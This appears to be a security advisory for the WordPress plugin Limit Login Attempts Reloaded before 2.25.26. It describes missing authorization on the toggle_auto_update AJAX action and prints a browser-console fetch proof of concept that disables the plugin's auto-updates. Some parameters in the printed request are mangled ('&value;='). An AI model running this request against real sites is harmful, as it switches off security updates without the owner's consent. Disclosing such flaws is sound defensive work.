Limit Login Attempts Reloaded < 2.25.26 - Admin+ Missing Authorization to Toggle Plugin Auto-Update

Description The plugin is missing authorization on the toggle_auto_update AJAX action, allowing any user with a valid nonce to toggle the auto-update status of the plugin.

PoC

As an Admin, open the Limit Login Attempts page in WP Admin and run the following code in the browser console: nonce = document.documentElement.innerHTML.match( /sec: ‘(\w+)’/ )[1]; await (await fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded; charset=UTF-8”, }, “body”: “action=toggle_auto_update&value;=no&sec;=” + nonce, “method”: “POST”, “mode”: “cors”, “credentials”: “include” })).text(); Check and see that auto-updates have been disabled for the Limit Login Attempts plugin.